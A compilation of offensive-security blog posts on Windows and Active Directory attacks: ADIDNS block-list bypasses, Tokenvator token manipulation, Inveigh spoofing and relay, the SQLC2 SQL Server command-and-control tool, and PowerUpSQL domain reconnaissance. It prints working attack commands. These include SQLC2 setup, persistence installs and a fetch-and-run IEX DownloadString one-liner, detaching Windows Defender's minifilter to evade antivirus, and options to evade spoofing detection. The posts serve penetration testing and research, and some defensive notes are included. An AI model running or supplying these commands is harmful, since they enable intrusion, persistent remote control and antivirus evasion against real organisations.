Web Proxy Auto-Discovery (WPAD) is of course a common target during LLMNR and NBNS spoofing. At first glance, WPAD would seem like the most obvious record to add through ADIDNS. Authenticated users can usually add the record since it does not exist by default.

If you do add a record for WPAD, you will likely find that it just doesn’t do anything. This behavior is due to the global query block list (GQBL), which contains WPAD and ISATAP by default.

Gqbl

Modern Windows DNS servers will usually not answer name requests which match hosts listed in the GQBL. Why did I include the word ‘usually’? Well, it turns out that the GQBL doesn’t always work.

Bypassing the GQBL

While I was experimenting with wildcard records, I noticed that Windows DNS servers ignored the GQBL and answered requests for WPAD through wildcards. At this point in the research timeline though, I hadn’t started working with LDAP. I could only add records through dynamic updates. Since the ‘*’ character didn’t work correctly with dynamic updates, I decided to look for a GQBL bypass method that would work with dynamic updates.

The first additional method I found was through DNAME records. Windows DNS servers would resolve WPAD if a DNAME record of ‘wpad’ was present in a zone.

Dname

Normally, DNAME records do not resolve requests that match the actual record. The DNS server should only answer requests for a host within the mapped domain such as ‘host.wpad.inveigh.net’. In this case, the root of ‘wpad.inveigh.net’ would resolve.

Strangely, I found that Windows DNS servers answered requests for the root of a DNAME record when certain conditions were met. The record needed to match a host that was listed on the GQBL and the GQBL needed to be enabled. With regards to WPAD, the default enabled GQBL actually made things worse.

Unfortunately, I couldn’t get DNAME records to work with dynamic updates. So, back I went looking for another bypass. I found this one in the form of adding an NS record for a WPAD subdomain.

Nsrecord

This method is slightly more complicated since it requires that the NS record points to a DNS server under your control. DNSChef, available on Kali, provides a simple way to set up a DNS server that will answer any received request.

Dnschef
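A minimal DNSChef invocation for this purpose might look like the following; the answer IP is a placeholder for a host you control:

dnschef --interface 0.0.0.0 --fakeip 192.168.1.100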

Again, I couldn’t get the bypass to work with dynamic updates. Once I finally started working with LDAP, all three bypass methods became trivial to implement.

Note, there appears to be a slight difference in behavior between Server 2016 and previous server versions. If you work with a record type that expects to point to a DNS record instead of an IP address, you will indeed need to use a DNS record. Earlier DNS server versions worked with IP addresses in most cases. With 2016, if a suitable target record does not already exist, you may need to add an additional record to get some record types set up as required for your attack.

CVE-2018-8320

I included details for the three GQBL bypasses when I turned my ADIDNS research over to Microsoft back in June. They informed me that they would assign CVE-2018-8320 for the GQBL and release a patch in October. I then disclosed the ADIDNS research while excluding any reference to WPAD and the GQBL.

The patch did indeed land in October. Here is a run-through of each bypass method on fully patched systems.

Gqbl Wildcard

Wildcard records no longer resolve requests for hosts listed on the GQBL.

Gqbl Dname

DNAME records no longer resolve requests for hosts listed on the GQBL.

Gqbl Ns

As you can see in the above screenshot, NS records continue to bypass the GQBL.

Ns Mac

Domain Suffix Search Order

In the original blog post, I recommended administrator controlled wildcard records as a defense against both ADIDNS wildcard attacks and LLMNR/NBNS spoofing. In a conversation that took place on r/netsec, a couple of people pointed out that wildcard records could cause problems when multiple domain suffixes are assigned to the search list through group policy.

Dnssuffixlist

After performing a few tests, I confirmed that they were correct. A wildcard placed in the zone of the higher domain suffix will prevent valid non-fully qualified requests from falling down to any lower domain suffixes where the matching valid record exists.

Dnssuffixtest

This behavior leads to an entirely new attack approach. Instead of targeting non-existent records in a zone, you can target requests for existing records. If you can add records to a zone listed as a suffix, you can target valid hosts in any lower priority domain suffix. Non-fully qualified requests for the targeted host will be resolved by the record you added.

Dnssuffixhosttest

Note, DNS suffixes should be taken into consideration when performing wildcard attacks. If you find a search list with multiple DNS suffixes, wildcard attacks could lead to disruptions when injecting into anything but the last zone on the list.

ADIDNS Attacks Through Phishing

With LLMNR/NBNS spoofing, the spoofing tool must continue to run throughout the attack. ADIDNS attacks however are conducted through only a small number of initial actions. Because of this, I believe that ADIDNS attacks are easier to deliver through phishing. Only one AD connected phishing target would need to execute a payload in order to add records potentially capable of sending traffic to remote, attacker controlled systems. You can use these records for things such as C2 or setting up additional phishing attacks.

Domainborrowing

Above is an example of adding a record pointing to a public IP using one of my PowerShell tools. For an actual phishing attack, you can use something more payload appropriate.
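As a hypothetical Powermad example along those lines (the node name and public IP are placeholders):

# Add an A record for 'payloadhost' pointing at an external host
New-ADIDNSNode -Node payloadhost -Data 203.0.113.10 -Verbose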

This is another area where NS records can be helpful for attacks. Once you setup the NS record, you can simply add additional records to the controlled subdomain through your own DNS server.

Domain Borrowing

ADIDNS attacks from outside the perimeter are particularly interesting when a company’s internal AD domain matches their public domain. In this scenario, you may be able to leverage the trust of the public domain to get around content filtering.

Domainborrowing

Of course, there are limitations with this technique. You will only be in a position to impact resources that are using the targeted ADIDNS for name resolution. There is also a chance that the records themselves, or any corresponding event IDs, will give you away. Most importantly, you will have a hard time setting up a trusted certificate for HTTPS due to lack of domain ownership.

C2 and Exfiltration Techniques

A while back, harmj0y posted an interesting blog about using AD as a C2 channel. How does that tie into ADIDNS? To review, when adding dnsNode objects, authenticated users receive full control upon creation. The dnsNode objects also contain a number of writable attributes. This results in dnsNode objects being candidates for C2 and exfiltration techniques through AD.

Of course, purely DNS based C2 and exfiltration techniques are also possible.

ADIDNS Defense Revisited

As mentioned, if you are using a search list with multiple DNS suffixes, an administrator controlled wildcard A record may cause problems. As an alternative, you can create a wildcard using a record type, such as a TXT record, that will not resolve name requests.

Txtrecord
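On the administration side, one way to create a non-resolving wildcard is with the DnsServer module on a DNS server or management host (the zone name is a placeholder):

# Create a wildcard TXT record that occupies the '*' dnsNode without resolving name requests
Add-DnsServerResourceRecord -ZoneName "inveigh.net" -Name "*" -Txt -DescriptiveText "wildcard placeholder"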

Since all record types are stored on a dnsNode object, adding any form of wildcard record will prevent an unprivileged user from adding their own dnsNode named ‘*’. Unfortunately, a non-resolving wildcard record will not have the added benefit of being a defense against LLMNR and NBNS spoofing.

Txtrecord

Ultimately, locking down the zone permissions is the cleanest way to mitigate authenticated user ADIDNS attacks. Depending on your setup, you may be able to take advantage of a dedicated DNS dynamic updates account within DHCP. This may allow you to remove the ‘Create all child objects’ permission for ‘Authenticated Users’ altogether.

Finally, keep in mind that many name resolution attacks are made possible by non-fully qualified name requests. User generated requests of this type are difficult to eliminate. When it comes to system and application configurations though, I would recommend always using fully qualified domain names if possible.

Wildcarddefenserevisited


Tokenvator: Release 2

What is Tokenvator?

Tokenvator is a token manipulation utility that is primarily used to alter the privileges of a process. In the original release we primarily focused on elevating process privileges. In this release, in addition to the usual bug fixes and improving existing features, I added several new features:

  • The ability to display additional token information
  • A help command that’s actually useful
  • Disabling and Removing Token Privileges
  • Named Pipe Tokens
  • Minifilter Manipulation

Use Cases:

There are a multitude of instances where elevating privilege or duplicating another process’s token is necessary to proceed on an assessment. Most credential theft mechanisms require SYSTEM privileges, and an impersonated SYSTEM token may not always be enough. Tokenvator now tries to not only impersonate tokens, but also to start the process with a primary token.

Samdump

Displaying Token Information:

It can be useful to know some limited information about a token. For instance, just because you’re impersonating a token doesn’t mean you inherit all the privileges of that token; not all SYSTEM tokens are created or impersonated identically.

In the example below we are operating as SYSTEM but are still in our original groups.

[screenshot]

However, in the second example below, we got SYSTEM via the command GetSystem, and this time we are operating as SYSTEM and placed in the relevant groups for SYSTEM.

[screenshot]

In this final example, we got SYSTEM via the command GetSystem cmd.exe, which used the same token to start a new process.

[screenshot]

Help Command Changes

In the first release, the help command left a lot to be desired; when the author of the tool can’t remember how to run a command and the help menu doesn’t help him… there might be a problem. So some changes were made to provide additional help for each supported method. Below is an example.

[screenshots]

Token Privilege Modifications:

In the previous release it was possible to enable a privilege on a process. In this example we are enabling SeSystemEnvironmentPrivilege on LogonUI.

[screenshot]

That’s neat, but what if we wanted to remove privileges from a process?

Tokenvator now supports disabling or deleting a privilege placed on a process. In this instance we first disable and then remove the SeDebugPrivilege from the PowerShell 6 process (pwsh.exe).

Disable Remove

But what if we really don’t want a process to have any privileges on a system? That is possible as well. In this example we remove all the privileges held by the splunkd process token. My intent is not to pick on Splunk, splunkd was just the first thing in my lab that met the example criteria. 😉

Nuke

Named Pipe Tokens

There are instances where we don’t have the SeDebugPrivilege and thus cannot open a process we do not own. In these instances, we need a different method to GetSystem. This is where named pipes come into play. Via the Windows APIs, we have the native ability to impersonate anyone who connects to our named pipe.

[screenshot]

This can be useful in other situations where services connect to a known named pipe name. In these instances, we can create an arbitrary named pipe and steal the remote process’s token as soon as it connects and writes to our pipe. For processes that use named pipes for inter-process communication, this opens up a potential attack surface.

[screenshot]

Minifilters:

Many defensive products use hooks to intercept calls to check for malicious activity. Microsoft has strongly suggested that, when it comes to the file system, vendors do not hook calls but instead use Minifilters, which are passed the file system data. AV / EDR products are given a specified altitude, or precedence, in which they are to inspect the file. This aspect of them also makes them trivial to identify.

Below are the Minifilters associated with Windows Defender and vShield.

[screenshots]

\Device\Mup is the Minifilter associated with UNC paths. To detach the filter monitoring network paths we can run a simple command. Note: Not all Minifilters can be detached, however many, many can be. This is because not all filters are programmed with an unload routine, the absence of which prevents a Minifilter from gracefully unloading.

[screenshot]
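The same mechanics can be illustrated with the built-in fltMC.exe utility from an elevated prompt; Tokenvator’s own command syntax differs, and the filter and instance names below are illustrative:

fltmc instances
fltmc detach WdFilter C: "WdFilter Instance"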

In the following demo we are going to be detaching a Minifilter from a file system so that we can run our tool while the AV product is still running.

Filters

If you’re looking for a more permanent way to disable Minifilters, I would suggest looking at this registry key.

[screenshot]

So that’s all for this release. Thank you to everyone who took the time to file bug reports and let me know how they were using the tool. And a special thank you to those who submitted pull requests for this release. If you have any suggestions or feature requests, please feel free to let me know.


Inveigh – What's New in Version 1.4

Ugh, I can’t believe it’s been a year and a half since the last release of Inveigh. I had intended to complete a new version back in March. At that time, my goals were to perform some refactoring, incorporate dynamic DNS updates, and add the ability to work with shares through NTLM challenge/response relay. In the end, the refactoring is really the only thing that went as planned. Oh well, September isn’t really all that far past March, right?

Wait, what’s an Inveigh?

If you aren’t familiar with Inveigh, here’s how I describe it on the wiki:

“Inveigh is a PowerShell LLMNR/mDNS/NBNS spoofer and man-in-the-middle tool designed to assist penetration testers/red teamers that find themselves limited to a Windows system. At its core, Inveigh is a .NET packet sniffer that listens for and responds to LLMNR/mDNS/NBNS requests while also capturing incoming NTLMv1/NTLMv2 authentication attempts over the Windows SMB service. The primary advantage of this packet sniffing method on Windows is that port conflicts with default running services are avoided. Inveigh also contains HTTP/HTTPS/Proxy listeners for capturing incoming authentication requests and performing attacks. Inveigh relies on creating multiple runspaces to load the sniffer, listeners, and control functions within a single shell and PowerShell process.”

I often hear people simply say, “Inveigh is the PowerShell version of Responder.” Which always makes me mumble to myself about packet sniffing and other design differences that are probably meaningless to most. Regardless of how Inveigh is described though, if you have used Responder, Inveigh’s functionality will be easy to understand. The main difference being that where Responder is the go-to tool for performing LLMNR/NBNS spoofing attacks, Inveigh is more for PowerShell based Windows post-exploitation use cases.

Inveigh

What’s new in Inveigh 1.4

In this blog post, I’ll go through the following major additions and details related to Inveigh 1.4:

Invoke-Inveigh Additions

Invoke-Inveigh is the main LLMNR, mDNS, and NBNS spoofing module.

ADIDNS Attacks

For a detailed explanation of ADIDNS attack techniques, see my blog post on the subject.

Inveigh now contains the following two optional ADIDNS attacks:

  • Wildcard – Inveigh will add a wildcard record to ADIDNS at startup.

Inveigh Wildcard

  • Combo – Inveigh keeps track of LLMNR/NBNS name requests. If the module sees the same request from a specified number of different systems, a matching record will be added to ADIDNS.

Inveigh Combo
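As a rough example, a startup invocation that enables the wildcard attack might look like the following; treat the parameter usage as illustrative and consult the wiki for exact syntax:

Invoke-Inveigh -ConsoleOutput Y -ADIDNS Wildcard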

Inveigh’s automated approach may not always be the best way to perform ADIDNS attacks; for manual options, see my Powermad project.

Note, the ADIDNS attacks ended up replacing and extending the role I had originally planned for dynamic DNS updates. I removed the dynamic DNS update code that existed in some of the early 1.4 dev versions.

Additional Detection Evasion Options

There are lots of tools designed to detect LLMNR and/or NBNS spoofers. Last year at DerbyCon, Beau Bullock, Brian Fehrman, and Derek Banks released CredDefense. This toolkit contains a spoofer detection tool named ResponderGuard. This tool can send requests directly to a host IP address rather than the traditional multicast/broadcast addresses. This technique has the added benefit of allowing detection across subnet boundaries. Inveigh can now detect and ignore these types of requests in order to help avoid detection.

I’ve also been noticing that endpoint protection products are leveraging agents to detect LLMNR/NBNS spoofers. If you see lots of random requests originating from each workstation, this detection technique is potentially in use. The ideal evasion technique is to watch the request traffic and pick out specific, potentially safe names to spoof. However, in an attempt to automate evading this type of detection, I’ve added the option to prevent Inveigh from responding to specific name requests unless they have been seen a specified number of times and/or from a specified number of different hosts. This should help weed out the randoms at the cost of skipping less frequent legitimate requests.
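
As a sketch, assuming the threshold parameter names below (they gate responses until a name has been requested the specified number of times and from the specified number of different hosts), a launch might look like:

Invoke-Inveigh -ConsoleOutput Y -SpooferThresholdHost 4 -SpooferThresholdNetwork 2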

Invoke-InveighRelay Additions

Invoke-InveighRelay is the HTTP, HTTPS, and Proxy to SMB relay module. I may have gotten a little carried away with the additions to this module for just a single release. The file share functionality led to maintaining authenticated SMB sessions, which begged for more targets, which inspired target enumeration (thanks Scott!), which reminded me of BloodHound, and now it’s September.

Relay Attacks

The new version contains the following three SMB2.1 compatible attacks:

  • Enumerate – The enumerate attack can perform Group, User, Share, and NetSession enumeration against a target.
  • Execute – Performs PsExec-style command execution. In previous versions of Inveigh Relay, this was the only available attack. Note, I removed SMB1 support.
  • Session – Inveigh Relay can now establish and maintain privileged/unprivileged authenticated SMB sessions. The sessions can be accessed with Invoke-SMBClient, Invoke-SMBEnum, and Invoke-SMBExec from my Invoke-TheHash project. Inveigh Relay will attempt to keep the sessions open as long as the module is running.

Inveigh Relay will accept any combination of the three attacks chained together.
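
For example, a run that chains all three attacks against a pair of targets might look like the line below (the IPs are placeholders, and exact parameter behavior is best confirmed in the wiki):

Invoke-InveighRelay -ConsoleOutput Y -Target 192.168.1.10,192.168.1.11 -Attack Enumerate,Session,Execute -Command "whoami"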

Disclaimer, I didn’t originally design the Invoke-TheHash SMB tools with this type of usage in mind. I will likely need to at least beef up the SMB error handling.
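
As a sketch of working with a captured session, listing a share through relay session 1 might look like the following; the session ID and UNC path are placeholders:

Invoke-SMBClient -Session 1 -Action List -Source \\192.168.1.10\c$ -Verbose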

Multiple Target Handling

Previously, Inveigh Relay could only target a single system. With the addition of the session attack, I thought it made sense to add the capability to target multiple systems without restarting the module. My initial implementation attempts focused on simply identifying valid targets and preventing things like unnecessarily performing the same source/destination relays over and over.

Later, after I created Invoke-SMBEnum for performing enumeration tasks, I started thinking that it would be useful to incorporate the enumeration code directly into Inveigh Relay. This would allow me to leverage the results, combined with incoming user session information obtained through relay, for making targeting decisions. Basically, the module would gather as much information about the environment as possible through unprivileged user relays and attempt to use that information to find relay source/target combinations that will provide privilege or access to file shares.

Inveigh Relay stores the following target information in memory, most of which is used for targeting decisions:

  • IP – Target’s current IP address.
  • Hostname – Target’s hostname.
  • DNS Domain – Target’s AD domain in DNS format.
  • NetBIOS Domain – Target’s AD domain in NetBIOS format.
  • Sessions – Target’s identified user sessions.
  • Administrators Users – Local Administrators group, user members.
  • Administrators Groups – Local Administrators group, group members.
  • Privileged – Users with command execution privilege on the target.
  • Shares – Target’s custom shares, if any.
  • NetSessions – Target’s NetSessions minus the NetSessions generated through the relay process.
  • NetSession Mapped – User sessions discovered through enumerating NetSessions on other targets.
  • Local Users – Target’s local users.
  • SMB2.1 – Status of SMB2.1 support on the target.
  • Signing – Status of SMB signing requirements on the target.
  • SMB Server – Whether or not SMB is running and accessible on the target.
  • DNS Record – Whether or not a DNS record was found if a lookup was performed.
  • IPv6 Only – Whether or not the host is IPv6 only.
  • Targeted – Timestamp for when the target was last targeted.
  • Enumerate – Timestamp for when the target was last enumerated with the ‘Enumerate’ attack.
  • Execute – Timestamp for the last time command execution was performed through the ‘Execute’ attack on the target.

One quick note regarding unprivileged system enumeration: you will likely encounter more and more systems that do not allow some forms of unprivileged enumeration. See this post from Microsoft for more details.

So far, Inveigh Relay uses the following priority list to select a target:

  1. Local Administrators Group (User Members) – The module will look up previously observed user sessions attached to an incoming connection. Next, Inveigh Relay will search for matches in the target pool’s enumerated local Administrators groups.
  2. Local Administrators Group (Nested Group Members) – The module will look up previously observed user sessions attached to an incoming connection. Next, Inveigh Relay will attempt to identify AD group membership for the sessions. Finally, the module will search for group matches in the target pool’s enumerated local Administrators groups. Note, Inveigh Relay alone does not have the ability to enumerate Active Directory (AD) group membership.
  3. NetSessions – The module will get the IP address of an incoming connection. Next, Inveigh Relay will search for matches within the target pool’s NetSessions. For example, if an incoming connection originates from ‘192.168.1.100’, any system with a NetSession that contains ‘192.168.1.100’ is a potential target.
  4. Custom Shares – The module will target systems that host custom shares (not defaults like C$, IPC$, etc.) that may be worth browsing with multiple users.
  5. Random – The module will optionally select a random target in the event an eligible target has not been found through the above steps. Inveigh Relay will apply logic to prioritize and exclude targets from within the random target pool.

BloodHound Integration

Once I started putting together targeting based on enumeration, I was of course reminded of the awesome BloodHound project. Since I consider Inveigh’s default state to be running from a compromised AD system, access to AD has usually already been achieved. With AD access, BloodHound can gather most of the same information as Inveigh Relay’s Enumerate attack with the bonus of having visibility into AD group membership.

When using imported BloodHound data, think of Inveigh Relay as one degree of local privilege, whereas BloodHound is six degrees of domain admin. Inveigh Relay does not have full BloodHound path visibility, so it is still a good idea to identify and specify relay targets that will grant the access required for the engagement goals.

Second disclaimer, I’ve mostly just tested targeting through BloodHound data in my lab environments. There are probably plenty of scenarios that can throw off the targeting, especially with large environments. I’ll continue to make adjustments to the targeting.

ConvertTo-Inveigh

ConvertTo-Inveigh is a new support function capable of importing BloodHound’s groups, computers, and sessions JSON files into memory.
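
The exact import syntax is best pulled from Get-Help ConvertTo-Inveigh; as a purely hypothetical sketch using BloodHound’s standard export file names, it would look something like:

# parameter names below are placeholders; check Get-Help ConvertTo-Inveigh for the real syntax
ConvertTo-Inveigh -Computers .\computers.json -Groups .\groups.json -Sessions .\sessions.json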

Project Links

Here are links to all of the projects mentioned in this blog post:

Inveigh: https://github.com/Kevin-Robertson/Inveigh

Invoke-TheHash: https://github.com/Kevin-Robertson/Invoke-TheHash

Powermad: https://github.com/Kevin-Robertson/Powermad

BloodHound: https://github.com/BloodHoundAD/BloodHound

Responder: https://github.com/lgandx/Responder

CredDefense Toolkit: https://github.com/CredDefense/CredDefense

What’s next for Inveigh?

For this version, I need to update the wiki, perform lots of targeting tweaks, and fix bugs. After that, I’m not entirely sure. There is certainly more to explore with BloodHound integration such as exporting session information collected through Inveigh. I’d also like to revisit my original unreleased C# PoC version of Inveigh. As for today though, I’m just happy to have finally escaped my dev branch.

Questions?

If you have any questions, reach out to me @kevin_robertson on Twitter or the amazingly helpful BloodHound Gang slack. Also, feel free to say hi if you see me wandering around DerbyCon!


Databases and Clouds: SQL Server as a C2

There is no shortage of dependable control channels or RATs these days, but I thought it would be a fun side project to develop one that uses SQL Server. In this blog, I’ll provide an overview of how to create and maintain access to an environment using SQL Server as the controller and the agent using a new PoC script called SQLC2.

It should be interesting to the adversarial simulation, penetration testing, red, purple, blue, and orange? teams out there looking for something random to play with.  Did I miss any marketing terms?

Why SQL Server?

Well, the honest answer is I just spend a lot of time with SQL Server and it sounded fun.  However, there are practical reasons too.  More companies are starting to use Azure SQL Server databases. When those Azure SQL Server instances are created, they are made accessible via a subdomain of “*.database.windows.net” on port 1433. For example, I could create an SQL Server instance named “mysupersqlserver.database.windows.net”. As a result, some corporate network configurations allow outbound internet access to any “*.database.windows.net” domain on port 1433.

So, the general idea is that as Azure SQL Server adoption grows, there will be more opportunity to use SQL Server as a control channel that looks kind of like normal traffic.
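
A quick way to test whether that egress path is open from a given network is a simple port check against your instance (the hostname below is the example name from above):

Test-NetConnection -ComputerName mysupersqlserver.database.windows.net -Port 1433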

SQLC2 Overview

SQLC2 is a PowerShell script for deploying and managing a command and control system that uses SQL Server as both the control server and the agent.

Basic functionality includes:

  • Configuring any SQL Server to be a controller
  • Installing/Uninstalling PowerShell and SQL Server based SQLC2 agents on Windows systems
  • Submitting OS commands remotely
  • Recovering OS command results remotely

SQLC2 can be downloaded from https://github.com/NetSPI/SQLC2/.

At its core, SQLC2 is just a few tables in an SQL Server instance that track agents, commands, and results. Nothing too fancy, but it may prove to be useful on some engagements.  Although this blog focuses on using an Azure SQL Server instance, you could host your own SQL Server in any cloud environment and have it listen on port 443 with SSL enabled. So, it could offer a little more flexibility depending on how much effort you want to put into it.

Naturally, SQLC2 was built for penetration test and red team engagements, but be aware that for this release I didn’t make a whole lot of effort to avoid blue team detection. If evasion is your goal, I recommend using the “Install-SQLC2AgentLink” agent installer instead of “Install-SQLC2AgentPs”. The link agent operates almost entirely at the SQL Server layer and doesn’t use any PowerShell, so it’s able to stay under the radar more than the other supported persistence methods.

Below is a diagram illustrating the SQLC2 architecture.

[Diagram: SQLC2 architecture]

For those who are interested, below I’ve provided an overview of the Azure setup, and a walkthrough of the basic SQLC2 workflow. Enjoy!

Setting Up an SQL Server in Azure

I was going to provide an overview of how to set up an Azure database, but Microsoft has already written a nice article on the subject. You can find it at
https://docs.microsoft.com/en-us/azure/sql-database/sql-database-get-started-portal.

SQLC2: Installing C2 Server Tables

The SQLC2 controller can be installed on any SQL Server by creating two tables within the provided database.  That database will then be used in future commands to check in agents, download commands, and upload command results.

Below is the command to set up the SQLC2 tables in a target SQL instance.

Install-SQLC2Server -Verbose -Instance sqlserverc21.database.windows.net -Database test1 -Username CloudAdmin -Password 'BestPasswordEver!'

You can use the SQLC2 command below to check which agents have phoned home. However, there won’t be any agents registered directly after the server installation.

Get-SQLC2Agent -Verbose -Instance sqlserverc21.database.windows.net -Database test1 -Username CloudAdmin -Password 'BestPasswordEver!'

Once agents and commands have been processed, the actual C2 tables will simply store the data. You can also connect directly to your Azure SQL Server with SQL Server Management Studio to view the results. Below is an example screenshot.

[Screenshot: SQLC2 tables viewed in SQL Server Management Studio]

SQLC2: Installing C2 Agents

SQLC2 supports three methods for installing and running agents that download and execute commands from the C2 server.

  1. Direct Execution: Executing commands directly via Get-SQLC2Command.
  2. Windows Scheduled Task: Installing an SQLC2 PowerShell agent that runs via a scheduled task every minute.
  3. SQL Server Agent Job: Installing an SQLC2 SQL Server agent job that communicates with the C2 server via a server link.

Option 1:  Direct Execution

You can list pending commands for the agent with the command below. All Get-SQLC2Command execution will automatically register the agent with the C2 server.

Get-SQLC2Command -Verbose -Instance sqlserverc21.database.windows.net -Database test1 -Username CloudAdmin -Password 'BestPasswordEver!'

Adding the -Execute flag will run pending commands.

Get-SQLC2Command -Verbose -Execute -Instance sqlserverc21.database.windows.net -Database test1 -Username CloudAdmin -Password 'BestPasswordEver!'

The examples above show how to run SQLC2 commands manually. However, you could have any persistence method load SQLC2 and run these commands to maintain access to the environment.
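
For example, a run key or scheduled task payload could be a one-liner along these lines (the hosting URL is a placeholder; the instance details match the examples above):

IEX (New-Object System.Net.WebClient).DownloadString('https://example.com/SQLC2.ps1'); Get-SQLC2Command -Verbose -Execute -Instance sqlserverc21.database.windows.net -Database test1 -Username CloudAdmin -Password 'BestPasswordEver!'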

Option 2:  Windows Scheduled Task

Installing an SQLC2 PowerShell agent to run via a scheduled task that runs every minute. Note: Using the -Type parameter, you can also install persistence via “run” or “image file execution options” registry keys.

Install-SQLC2AgentPs -Verbose -Instance sqlserverc21.database.windows.net -Database test1 -Username CloudAdmin -Password 'BestPasswordEver!'

It can be uninstalled with the command below:

Uninstall-SQLC2AgentPs -Verbose

Option 3:  SQL Server Agent Job

Installing an SQLC2 SQL Server agent job that communicates with the C2 server via a server link.

Install-SQLC2AgentLink -Verbose -Instance 'MSSQLSRV04SQLSERVER2014' -C2Instance sqlserverc21.database.windows.net -C2Database test1 -C2Username CloudAdmin -C2Password 'BestPasswordEver!'

For those who are interested, I’ve also provided a TSQL version of the SQL Server agent installer you can find at https://github.com/NetSPI/SQLC2/blob/master/tsql/Install-SQLC2AgentLink.sql.

It can be uninstalled with the command below.

Uninstall-SQLC2AgentLink -Verbose -Instance 'MSSQLSRV04SQLSERVER2014'

SQLC2: Issuing OS Commands

To send a command to a specific agent, you can use the command below. Please note that in this release the agent names are either the computer name or the SQL Server instance name the agent was installed on. Below are a few command examples showing a registered agent and issuing a command to it.

Get-SQLC2Agent -Verbose -Instance sqlserverc21.database.windows.net -Database test1 -Username CloudAdmin -Password 'BestPasswordEver!'

Set-SQLC2Command -Verbose -Instance sqlserverc21.database.windows.net -Database test1 -Username CloudAdmin -Password 'BestPasswordEver!' -Command "Whoami" -ServerName MSSQLSRV04

SQLC2: Get Command Results

Below is the command for viewing the command results. It supports filters for server name, command status, and command ID.

Get-SQLC2Result -Verbose -ServerName "MSSQLSRV04" -Instance sqlserverc21.database.windows.net -Database test1 -Username CloudAdmin -Password 'BestPasswordEver!'

SQLC2: Uninstalling C2 Tables

Below are some additional commands for cleaning up when you’re done. They include commands to clear the command history table, clear the agent table, and remove the C2 tables altogether.

Clear command history:
Remove-SQLC2Command -Verbose -Instance sqlserverc21.database.windows.net -Database test1 -Username CloudAdmin -Password 'BestPasswordEver!'
Clear agent list:
Remove-SQLC2Agent -Username c2admin -Password 'SqlServerPasswordYes!' -Instance sqlserverc21.database.windows.net -Database test1 -Verbose
Remove SQLC2 tables:
Uninstall-SQLC2Server -Verbose -Instance sqlserverc21.database.windows.net -Database test1 -Username CloudAdmin -Password 'BestPasswordEver!'

Blue Team Notes

  • The PowerShell commands and agents should show up in your PowerShell logs, which can be a useful data source (see the example query after this list).
  • The persistence methods for tasks, registry run keys, and “image file execution options” registry keys can all be audited, and alerts can be configured. The commands used to create the persistence also tend to generate Windows event logs that can be useful, and most Endpoint Detection and Response solutions can identify the commands at execution time.
  • If possible, deploy audit configurations to internal SQL Servers to help detect rogue agent jobs, ad-hoc queries, and server links. I have some old examples of logging options here. If configured correctly, they can feed alerts directly into the Windows event log.
  • Although it’s harder than it sounds, try to understand what’s normal for your environment. If you can restrict access to “*.database.windows.net” to only those who need it, then it can be an opportunity to both block outbound access and detect failed attempts.  Network and DNS logs can come in handy for that.
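
As a quick illustration, if PowerShell Script Block Logging is enabled, a defender could sweep for SQLC2 activity with a query along these lines (the 'SQLC2' string match is just a naive starting point):

Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-PowerShell/Operational'; Id=4104} | Where-Object { $_.Message -match 'SQLC2' }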

Wrap Up

SQLC2 is a pretty basic proof of concept, but I think it’s functional enough to illustrate the idea.  Eventually, I’ll likely roll it into PowerUpSQL for the sake of keeping the offensive SQL Server code together. At that point, maybe I’ll also roll in a few CLR functions to step it up a bit.  In the meantime, for those of you looking to explore more offensive cloudscape options, check out Karl Fosaaen’s blog on other Azure services that can be useful during red team engagements. It’s pretty interesting.


Dumping Active Directory Domain Info – with PowerUpSQL!

This blog walks through how to use the OLE DB ADSI provider in SQL Server to query Active Directory for information.  I’ll also share a number of new PowerUpSQL functions that can be used for automating common AD recon activities through SQL Server. Hopefully this will be useful to red teamers, pentesters, and database enthusiasts. Thanks to Scott Sutherland (@_nullbind) for his work on both the AD recon functions and PowerUpSQL!

The T-SQL

The T-SQL below shows how the ADSI provider is used with OPENQUERY and OPENROWSET to query for Active Directory information. First, a SQL Server link needs to be created for the ADSI provider; in the example below, the link is named “ADSI”.

-- Create SQL Server link to ADSI
IF (SELECT count(*) FROM master..sysservers WHERE srvname = 'ADSI') = 0
EXEC master.dbo.sp_addlinkedserver @server = N'ADSI',
@srvproduct=N'Active Directory Service Interfaces',
@provider=N'ADSDSOObject',
@datasrc=N'adsdatasource'
ELSE
SELECT 'The target SQL Server link already exists.'

If using OPENQUERY, associate the link with the current authentication context. A username and password can also be specified here. Then run the example query.

Note: The LDAP “path” should be set to the target domain.

-- Define authentication context - OpenQuery
EXEC sp_addlinkedsrvlogin
@rmtsrvname=N'ADSI',
@useself=N'True',
@locallogin=NULL,
@rmtuser=NULL,
@rmtpassword=NULL
GO
-- Use openquery
SELECT *
FROM OPENQUERY([ADSI],'<LDAP://path>;(&(objectCategory=Person)(objectClass=user));name, adspath;subtree')

If using OPENROWSET, enable ad hoc queries. Then run the example query with a specified username and password or default authentication.

Note: The LDAP “path” should be set to the target domain.

-- Enable 'Show Advanced Options'
EXEC sp_configure 'Show Advanced Options', 1
RECONFIGURE
GO

-- Enable 'Ad Hoc Distributed Queries'
EXEC sp_configure 'Ad Hoc Distributed Queries', 1
RECONFIGURE
GO

-- Run with openrowset
SELECT *
FROM OPENROWSET('ADSDSOOBJECT','adsdatasource',
'<LDAP://path>;(&(objectCategory=Person)(objectClass=user));name, adspath;subtree')

Loading PowerUpSQL

PowerUpSQL can be loaded quite a few different ways in PowerShell. Below is a basic example showing how to download and import the module from GitHub.

IEX(New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/NetSPI/PowerUpSQL/master/PowerUpSQL.ps1")

Newly Added Active Directory Recon Functions

Now that you have PowerUpSQL loaded, you can use the new commands to execute queries against the domain.  However, please be aware that all commands require sysadmin privileges.

  • Get-SQLDomainAccountPolicy – Provides the domain account policy for the SQL Server’s domain.
  • Get-SQLDomainComputer – Provides a list of the domain computers on the SQL Server’s domain.
  • Get-SQLDomainController – Provides a list of the domain controllers on the SQL Server’s domain.
  • Get-SQLDomainExploitableSystem – Provides a list of the potentially exploitable computers on the SQL Server’s domain based on operating system version information.
  • Get-SQLDomainGroup – Provides a list of the domain groups on the SQL Server’s domain.
  • Get-SQLDomainGroupMember – Provides a list of the domain group members on the SQL Server’s domain.
  • Get-SQLDomainObject – Can be used to execute arbitrary LDAP queries on the SQL Server’s domain (see the example after this list).
  • Get-SQLDomainOu – Provides a list of the organizational units on the SQL Server’s domain.
  • Get-SQLDomainPasswordsLAPS – Provides a list of the local administrator passwords on the SQL Server’s domain. This typically requires Domain Admin privileges.
  • Get-SQLDomainSite – Provides a list of sites.
  • Get-SQLDomainSubnet – Provides a list of subnets.
  • Get-SQLDomainTrust – Provides a list of domain trusts.
